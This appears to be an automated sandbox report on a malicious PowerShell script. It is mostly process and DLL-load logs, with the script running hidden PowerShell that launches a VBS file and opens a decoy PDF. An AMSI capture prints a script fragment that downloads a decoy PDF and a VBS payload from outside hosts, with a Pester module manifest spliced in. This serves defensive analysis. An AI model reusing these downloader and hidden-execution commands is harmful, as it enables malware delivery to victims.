      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: gCXzb0K8Ci.ps1 | ReversingLabs: Detection: 34%
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown (2 events)
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown (6 events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 events)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: ystem.pdbm source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.2108563780.000001A0C0426000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7B29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2105240541.000001A0C017E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdbH source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb3K source: powershell.exe, 00000003.00000002.2104667258.000001A0C0108000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbG source: powershell.exe, 00000000.00000002.2319308884.00000293F7AC0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.pdbr source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF848F26D67 push esp; retf 0_2_00007FF848F26D68
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF848F27967 push esp; retf 0_2_00007FF848F27968
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF848FF1C28 pushad ; retf 0_2_00007FF848FF1C29
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848FE0D6C push eax; ret 3_2_00007FF848FE0D6D

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htbkqwww.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.pdf';getit -fz $flol -oulv 'http://www.bluhwamaxxlashwar.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
